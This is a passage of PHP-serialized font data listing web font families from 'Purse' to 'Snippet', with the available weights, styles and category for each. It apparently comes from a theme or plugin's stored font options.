Purse\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Qahiri\";a:3:{s:5:\"label\";s:6:\"Qahiri\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Quando\";a:3:{s:5:\"label\";s:6:\"Quando\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Quantico\";a:3:{s:5:\"label\";s:8:\"Quantico\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Quattrocento\";a:3:{s:5:\"label\";s:12:\"Quattrocento\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Quattrocento Sans\";a:3:{s:5:\"label\";s:17:\"Quattrocento Sans\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Questrial\";a:3:{s:5:\"label\";s:9:\"Questrial\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Quicksand\";a:3:{s:5:\"label\";s:9:\"Quicksand\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Quintessential\";a:3:{s:5:\"label\";s:14:\"Quintessential\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Qwigley\";a:3:{s:5:\"label\";s:7:\"Qwigley\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:15:\"Racing Sans One\";a:3:{s:5:\"label\";s:15:\"Racing Sans One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Radley\";a:3:{s:5:\"label\";s:6:\"Radley\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Rajdhani\";a:3:{s:5:\"label\";s:8:\"Rajdhani\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Rakkas\";a:3:{s:5:\"label\";s:6:\"Rakkas\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Raleway\";a:3:{s:5:\"label\";s:7:\"Raleway\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Raleway Dots\";a:3:{s:5:\"label\";s:12:\"Raleway Dots\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Ramabhadra\";a:3:{s:5:\"label\";s:10:\"Ramabhadra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Ramaraja\";a:3:{s:5:\"label\";s:8:\"Ramaraja\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Rambla\";a:3:{s:5:\"label\";s:6:\"Rambla\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Rammetto One\";a:3:{s:5:\"label\";s:12:\"Rammetto One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Ranchers\";a:3:{s:5:\"label\";s:8:\"Ranchers\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Rancho\";a:3:{s:5:\"label\";s:6:\"Rancho\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Ranga\";a:3:{s:5:\"label\";s:5:\"Ranga\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Rasa\";a:3:{s:5:\"label\";s:4:\"Rasa\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Rationale\";a:3:{s:5:\"label\";s:9:\"Rationale\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Ravi Prakash\";a:3:{s:5:\"label\";s:12:\"Ravi Prakash\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Recursive\";a:3:{s:5:\"label\";s:9:\"Recursive\";s:8:\"variants\";a:7:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Red Hat Display\";a:3:{s:5:\"label\";s:15:\"Red Hat Display\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:3:\"900\";i:5;s:9:\"900italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Red Hat Text\";a:3:{s:5:\"label\";s:12:\"Red Hat Text\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Red Rose\";a:3:{s:5:\"label\";s:8:\"Red Rose\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Redressed\";a:3:{s:5:\"label\";s:9:\"Redressed\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Reem Kufi\";a:3:{s:5:\"label\";s:9:\"Reem Kufi\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Reenie Beanie\";a:3:{s:5:\"label\";s:13:\"Reenie Beanie\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Reggae One\";a:3:{s:5:\"label\";s:10:\"Reggae One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Revalia\";a:3:{s:5:\"label\";s:7:\"Revalia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Rhodium Libre\";a:3:{s:5:\"label\";s:13:\"Rhodium Libre\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Ribeye\";a:3:{s:5:\"label\";s:6:\"Ribeye\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Ribeye Marrow\";a:3:{s:5:\"label\";s:13:\"Ribeye Marrow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Righteous\";a:3:{s:5:\"label\";s:9:\"Righteous\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Risque\";a:3:{s:5:\"label\";s:6:\"Risque\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Roboto\";a:3:{s:5:\"label\";s:6:\"Roboto\";s:8:\"variants\";a:12:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Roboto Condensed\";a:3:{s:5:\"label\";s:16:\"Roboto Condensed\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Roboto Mono\";a:3:{s:5:\"label\";s:11:\"Roboto Mono\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:11:\"Roboto Slab\";a:3:{s:5:\"label\";s:11:\"Roboto Slab\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Rochester\";a:3:{s:5:\"label\";s:9:\"Rochester\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Rock Salt\";a:3:{s:5:\"label\";s:9:\"Rock Salt\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"RocknRoll One\";a:3:{s:5:\"label\";s:13:\"RocknRoll One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Rokkitt\";a:3:{s:5:\"label\";s:7:\"Rokkitt\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Romanesco\";a:3:{s:5:\"label\";s:9:\"Romanesco\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Ropa Sans\";a:3:{s:5:\"label\";s:9:\"Ropa Sans\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Rosario\";a:3:{s:5:\"label\";s:7:\"Rosario\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Rosarivo\";a:3:{s:5:\"label\";s:8:\"Rosarivo\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Rouge Script\";a:3:{s:5:\"label\";s:12:\"Rouge Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Rowdies\";a:3:{s:5:\"label\";s:7:\"Rowdies\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Rozha One\";a:3:{s:5:\"label\";s:9:\"Rozha One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Rubik\";a:3:{s:5:\"label\";s:5:\"Rubik\";s:8:\"variants\";a:14:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:3:\"900\";i:11;s:9:\"900italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Rubik Mono One\";a:3:{s:5:\"label\";s:14:\"Rubik Mono One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Ruda\";a:3:{s:5:\"label\";s:4:\"Ruda\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Rufina\";a:3:{s:5:\"label\";s:6:\"Rufina\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Ruge Boogie\";a:3:{s:5:\"label\";s:11:\"Ruge Boogie\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Ruluko\";a:3:{s:5:\"label\";s:6:\"Ruluko\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Rum Raisin\";a:3:{s:5:\"label\";s:10:\"Rum Raisin\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Ruslan Display\";a:3:{s:5:\"label\";s:14:\"Ruslan Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Russo One\";a:3:{s:5:\"label\";s:9:\"Russo One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Ruthie\";a:3:{s:5:\"label\";s:6:\"Ruthie\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:3:\"Rye\";a:3:{s:5:\"label\";s:3:\"Rye\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"STIX Two Math\";a:3:{s:5:\"label\";s:13:\"STIX Two Math\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Sacramento\";a:3:{s:5:\"label\";s:10:\"Sacramento\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Sahitya\";a:3:{s:5:\"label\";s:7:\"Sahitya\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:4:\"Sail\";a:3:{s:5:\"label\";s:4:\"Sail\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Saira\";a:3:{s:5:\"label\";s:5:\"Saira\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Saira Condensed\";a:3:{s:5:\"label\";s:15:\"Saira Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Saira Extra Condensed\";a:3:{s:5:\"label\";s:21:\"Saira Extra Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Saira Semi Condensed\";a:3:{s:5:\"label\";s:20:\"Saira Semi Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Saira Stencil One\";a:3:{s:5:\"label\";s:17:\"Saira Stencil One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Salsa\";a:3:{s:5:\"label\";s:5:\"Salsa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Sanchez\";a:3:{s:5:\"label\";s:7:\"Sanchez\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Sancreek\";a:3:{s:5:\"label\";s:8:\"Sancreek\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Sansita\";a:3:{s:5:\"label\";s:7:\"Sansita\";s:8:\"variants\";a:8:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:3:\"800\";i:3;s:9:\"800italic\";i:4;s:3:\"900\";i:5;s:9:\"900italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Sansita Swashed\";a:3:{s:5:\"label\";s:15:\"Sansita Swashed\";s:8:\"variants\";a:7:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Sarabun\";a:3:{s:5:\"label\";s:7:\"Sarabun\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Sarala\";a:3:{s:5:\"label\";s:6:\"Sarala\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Sarina\";a:3:{s:5:\"label\";s:6:\"Sarina\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Sarpanch\";a:3:{s:5:\"label\";s:8:\"Sarpanch\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Satisfy\";a:3:{s:5:\"label\";s:7:\"Satisfy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:15:\"Sawarabi Gothic\";a:3:{s:5:\"label\";s:15:\"Sawarabi Gothic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Sawarabi Mincho\";a:3:{s:5:\"label\";s:15:\"Sawarabi Mincho\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Scada\";a:3:{s:5:\"label\";s:5:\"Scada\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Scheherazade\";a:3:{s:5:\"label\";s:12:\"Scheherazade\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Schoolbell\";a:3:{s:5:\"label\";s:10:\"Schoolbell\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Scope One\";a:3:{s:5:\"label\";s:9:\"Scope One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Seaweed Script\";a:3:{s:5:\"label\";s:14:\"Seaweed Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Secular One\";a:3:{s:5:\"label\";s:11:\"Secular One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Sedgwick Ave\";a:3:{s:5:\"label\";s:12:\"Sedgwick Ave\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:20:\"Sedgwick Ave Display\";a:3:{s:5:\"label\";s:20:\"Sedgwick Ave Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:3:\"Sen\";a:3:{s:5:\"label\";s:3:\"Sen\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:3:\"800\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Sevillana\";a:3:{s:5:\"label\";s:9:\"Sevillana\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Seymour One\";a:3:{s:5:\"label\";s:11:\"Seymour One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Shadows Into Light\";a:3:{s:5:\"label\";s:18:\"Shadows Into Light\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:22:\"Shadows Into Light Two\";a:3:{s:5:\"label\";s:22:\"Shadows Into Light Two\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Shanti\";a:3:{s:5:\"label\";s:6:\"Shanti\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Share\";a:3:{s:5:\"label\";s:5:\"Share\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Share Tech\";a:3:{s:5:\"label\";s:10:\"Share Tech\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Share Tech Mono\";a:3:{s:5:\"label\";s:15:\"Share Tech Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:15:\"Shippori Mincho\";a:3:{s:5:\"label\";s:15:\"Shippori Mincho\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Shippori Mincho B1\";a:3:{s:5:\"label\";s:18:\"Shippori Mincho B1\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Shojumaru\";a:3:{s:5:\"label\";s:9:\"Shojumaru\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Short Stack\";a:3:{s:5:\"label\";s:11:\"Short Stack\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Shrikhand\";a:3:{s:5:\"label\";s:9:\"Shrikhand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Siemreap\";a:3:{s:5:\"label\";s:8:\"Siemreap\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Sigmar One\";a:3:{s:5:\"label\";s:10:\"Sigmar One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Signika\";a:3:{s:5:\"label\";s:7:\"Signika\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Signika Negative\";a:3:{s:5:\"label\";s:16:\"Signika Negative\";s:8:\"variants\";a:4:{i:0;s:3:\"300\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Simonetta\";a:3:{s:5:\"label\";s:9:\"Simonetta\";s:8:\"variants\";a:4:{i:0;s:3:\"900\";i:1;s:9:\"900italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Single Day\";a:3:{s:5:\"label\";s:10:\"Single Day\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Sintony\";a:3:{s:5:\"label\";s:7:\"Sintony\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Sirin Stencil\";a:3:{s:5:\"label\";s:13:\"Sirin Stencil\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Six Caps\";a:3:{s:5:\"label\";s:8:\"Six Caps\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Skranji\";a:3:{s:5:\"label\";s:7:\"Skranji\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Slabo 13px\";a:3:{s:5:\"label\";s:10:\"Slabo 13px\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Slabo 27px\";a:3:{s:5:\"label\";s:10:\"Slabo 27px\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Slackey\";a:3:{s:5:\"label\";s:7:\"Slackey\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Smokum\";a:3:{s:5:\"label\";s:6:\"Smokum\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Smythe\";a:3:{s:5:\"label\";s:6:\"Smythe\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Sniglet\";a:3:{s:5:\"label\";s:7:\"Sniglet\";s:8:\"variants\";a:2:{i:0;s:3:\"800\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Snippet\";a:3:{s:5:\"label\";s:7:\"Snippet\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"S